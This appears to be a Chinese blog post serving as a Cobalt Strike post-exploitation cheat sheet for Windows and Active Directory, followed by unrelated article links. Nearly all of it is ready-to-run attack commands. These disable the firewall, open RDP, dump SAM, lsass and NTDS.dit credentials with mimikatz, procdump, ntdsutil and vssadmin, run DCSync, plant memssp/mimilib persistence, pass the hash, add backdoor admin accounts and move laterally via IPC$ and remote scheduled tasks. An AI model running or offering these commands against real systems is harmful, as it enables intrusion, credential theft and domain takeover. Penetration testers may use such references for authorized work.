Cobalt Strike

embedded/2024/10/11 3:40:53/

信息收集

主机信息收集

# ip信息
shell ipconfig
# 系统信息,补丁信息
shell systeminfo
# 架构
shell echo %PROCESSOR_ARCHITECTURE% 
# 软件信息
shell wmic product get name,version
# 查看安装服务
shell wmic service list brief
# 查看运行进程
shell talklist
shell wmic process list brief
# 查看开机自启程序
shell wmic startup get command.caption
# 查看计划任务
schtasks /query /fo LIST /v
# 查看主机时间
shell net statistics workstation
# 查看本地有什么用户
shell net user
# 查看会话列表
shell net session
# 查看开启端口
shell netstat -ano
# 杀毒软件信息
shell wmic /node:localhost /namespace:\\root\securitycenter2 path
# 查看是否存在共享文件夹
shell net share
# 查看防火墙状态/配置
shell netsh firewall show state/config
# 关闭防火墙
shell netsh firewall set opmode disable
# 允许指定程序进行全部连接
shell netsh firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
# 允许3389端口放行
shell netsh advfirewall firewall add rule name="name" protocol=TCP dir=in localport=3389 action=allow 
# 开启3389
shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 获取wifi配置文件
netsh wlan show profiles
# 获取wifi详细信息
netsh wlan show profile name="SSID_NAME" key=clear
# 查看arp缓存
shell arp -a
# 查看本地工作组
shell net localgroup
# 查看RDP凭证
shell dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

域内信息收集

域内基本信息

# 查看主机是否在域内
systeminfo
ipconfig /all
# 查看是否为域用户
whoami
# 查看当前组
shell net localgroup
# 查域内有多少个组
net group "groupname" /domain
# 查看域内有多少主机
net view
#打印路由表
route print 
# 打印arp表
arp -a
# 显示端口
netstat -ano
# 查看域信任关系
nltest /domain——trusts
# 查看域控
net time /domain  # 只有域用户才能查出来
nltest /DCLIST:hacke
# 定位域管理员用户
net group "domain admins" /domainhostname和whoami 显示的不同大概率为域用户
获取到shell-》kali 自动化脚本
run winenumpowersploit(进入攻击脚本)
获取到shell-》
加载脚本
load powershell
导入脚本
powershell_import 路径/PowerView.ps1
执行脚本(可以搜索powersploit命令,在execute后执行就行)
powershell_execute get-NetDomain
powershell_execute get-NetUser
powershell_execute get-NetComputer

定位域控

# 获取到域控ip
ping 域名
shell nslookup -type=SRV _ldap._tcp

定位域管理员登录的主机

# 使用PsLoggedon.exe,需要上传到以控制的域内主机中
PsLoggedon.exe \\hostname
PsLoggedon.exe username# 自动化获取域内登录的用户
PVEFindADUser.exe -currentnetview.exe -dpowershell.exe -exec bypass -command "& {fimport-module .\PowerView.ps1;|nvoke-UserHunter}"

内网主机扫描

 shell for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.20.%I | findstr "TTL="

fscan:全自动内网信息扫描

fscan.exe -h 网段

密码抓取

# 工具mimikatz 要求:权限为:admin、system、UAC用户
在线读取
shell mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit离线读取
将sam文件导出,system是sam的密钥
shell reg save hklm\sam sam.hive
shell reg save hklm\system system.hive
再使用mimikatz进行读取
token::elevate
lsadump::sam /sam:sam.hive /system:system.hive读取lsass进程的密码
找到lsass的进程好
tasklist | findstr lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
使用minidump等工具导出内存

高版本抓密码(高版本win系统不缓存明文密码)

修改缓存

开启缓存记录
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
锁屏命令
rundll32.exe user32.dll,LockWorkStation可以抓取到明文密码

 ssp内存注入

# 重启后失效,会将密码保存在c:\windows\system32\mimilsa
shell mimikatz "privilege:debug" "misc::memssp" exit# 由于权限问题无法直接访问到mimilsa
需要创建计划任务使用bat文件去复制
schtasks /create  /tn copy /sc onstart /tr C:\Users\1001\Desktop\1.bat /ru system /f1.batcopy C:\windows\system32\mimilsa.log C:\Users\1001\Desktop\1.txt运行
schtasks /run /i /tn "copy"---------------------------------------------------------------------------------------
ssp开机自启,存放在c:\windows\system32\kiwissp
shell copy mimilib.dll c:\windows\system32
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f

域控账号密码抓取

域账号信息存放在C:\Windows\NTDS.DIT,密钥:system.hive

# 使用ntdsutil工具(域控服务器自带,备份工具)
创建快照
ntdsutil.exe snapshot "activate instance ntds" create q q
挂载
ntdsutil.exe snapshot "mount {1efdbb78-49ea-49db-a4ea-ddf3aef1701f}" q q
复制出来
copy  C:\$SNAP_202409261557_VOLUMEC$\windows\ntds\ntds.dit C:\Users\Administrator\Desktop\
删除快照
ntdsutil.exe snapshot "umount {1efdbb78-49ea-49db-a4ea-ddf3aef1701f}" "delete {1efdbb78-49ea-49db-a4ea-ddf3aef1701f}" q q# 使用vssadmin
创建快照
vssadmin create shadow /for=c:
复制
shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit C:\Users\Administrator\Desktop\ntds2.dit
删除
vssadmin delete shadows /for=c: /quiet也可使用copy-vss工具、lnvoke-ninjacopy(日志较少)

ntds文件读取

# 使用ntdsdumpex工具
NTDSDumpEx -d ntds.dit -s system.hive -o 1.txt

在线获取域用户信息

mimikatz lsadump::dcsync /domain:wang.com /all /csv

Dcsync攻击(domain control synchronization)

Dcsync用于域林之间不同域控去同步数据,使用drs协议去同步

可以使用的用户范围

admin

domain admins

enterprise admins

DC 本地用户

# 使用mimikatz可以伪造dcsync包去欺骗域控,可以不用域控的shell远程获取domain的用户信息
有权限时
mimikatz lsadump::dcsync /domain:wang.com /all /csv没权限但有一个用户密码的hash时
secretsdump.exe 域名/用户名:密码@ip明文读取(前提使用了可逆加密)

RDP远程密码抓取

rdp使用masterkey加密后保存在本地,然后下次使用时就不用输入密码

# 在线读
查看连接记录
cmdkey /list查找本地凭据(credentials)
dir /a %userprofile%\appdata\local\microsoft\credentials\*读取凭据,找到guid
mimikatz dpapi::cred /in:绝对路径读取内存找到guid对应的masterkey
mimikatz sekurlsa::dpapi读取凭据并使用msaterkey解密
mimikatz dpapi::cred /in:绝对路径 /masterkey:# 离线读
保存lsass文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmpmimikatz载入lsass内存
sekuelsa::minidump lsass.dmp
使用上面的方法进行读取

 

横向移动

# 开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f# 查看rdp端口
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber# 抓取密码#hash远程
mimikatz sekurlsa::pth /user:administrator /domain:192.168.20.110 /ntlm:8019de0efe99442ffecc78646755d4ac "/run:mstsc.exe /restrictedadmin"# 添加账号,进行远程
net user wangg password /add
shell net localgroup Administrators wangg /add

todesk远程

#静默安装
todesk.exe /S# 查看todesk中的配置文件,获取账号信息
type c:\"Program Files"\Todesk\config.ini
# 使用本地的hash值替换配置文件

IPC$

利用条件

1.开启了139、445端口

2.开启了默认分享盘符

3.知道用户名和密码

# 增加删除IPC,建立连接后无需密码直接访问
net use \\192.168.10.160\IPC$ "qwe123@#" /user:administrator
net use \\192.168.10.160\IPC$ del

管理共享文件

net share C$ /del
net share 共享名=位置

IPC命令

dir \\192.168.10.160\C$

远程添加计划任务

# 创建
schtasks /create /s 192.168.20.222 /p qwe123@# /u administrator /tn test /tr c:/1.exe /sc onstart /RU System /F
# 运行
schtasks /run /s 192.168.20.222 /i /tn "test"
# 删除
schtasks /delete /s 192.168.20.222 /u administrator -p qwe123@# /tn test /f

 


http://www.ppmy.cn/embedded/125250.html

相关文章

大学生就业市场:Spring Boot招聘系统的设计与实现

4系统概要设计 4.1概述 本系统采用B/S结构(Browser/Server,浏览器/服务器结构)和基于Web服务两种模式,是一个适用于Internet环境下的模型结构。只要用户能连上Internet,便可以在任何时间、任何地点使用。系统工作原理图如图4-1所示: 图4-1系统工作原理…

PostgreSQL的pglz使用限制

PostgreSQL的pglz使用限制 在 PostgreSQL 中,PGLZ(PostgreSQL Lightweight Compression Algorithm)是一种用于压缩数据的算法,主要用于 TOAST(The Oversized-Attribute Storage Technique)机制。PGLZ 的使…

简历投递经验01

嵌入式简历制作指南与秋招求职建议 技术要求概览 在嵌入式领域求职时,技术能力是HR和面试官最关注的点之一。以下是一些关键技术点,以及它们在简历中的体现方式。 1. 编程语言与开发环境 掌握C/C语言。熟悉至少一种单片机或微处理器的开发环境。 2.…

数据科学基础复习(简)

可视化、数据可视化 在狭义上,数据可视化是与信息可视化,科学可视化和可视分析学平行的概念,而在广义上数据可视化可以包含这3类可视化技术。 数据科学的主要任务 数据科学研究目的与任务 大数据及其运动规律的揭示从数据到智慧的转化数据…

HC32L17x的LL驱动库

这个库是参考ST的LL库格式,个人维护和调试的库;本库开源在21.ic网站;在这个网站上有完整的驱动库和配套的文件:链接如下:华大L17x模拟ST的LL库编写的驱动库 - - 21ic电子技术开发论坛; 备注:由于…

明星周边销售网站开发:SpringBoot技术全解析

1系统概述 1.1 研究背景 如今互联网高速发展,网络遍布全球,通过互联网发布的消息能快而方便的传播到世界每个角落,并且互联网上能传播的信息也很广,比如文字、图片、声音、视频等。从而,这种种好处使得互联网成了信息传…

CMake所学

向大佬lyf学习,先把其8服务器中所授fine 文章目录 前言一、CMakeList.txt 命令1.1 最外层CMakeLists1.1.1 cmake_minimum_required()1.1.2 project()1.1.3 set()1.1.4 add_subdirectory&#xf…

CSP-J/S复赛算法 动态规划初步

文章目录 前言动态规划动态规划常见形式动态规划求最值的几个例子1. **背包问题**2. **最短路径问题**3. **最小硬币找零问题**4. **最长递增子序列** 总结 最优子结构举个简单的例子其他例子条件 DP的核心就是穷举具体解释 递归的算法时间复杂度dp数组的迭代解法通俗易懂的解释…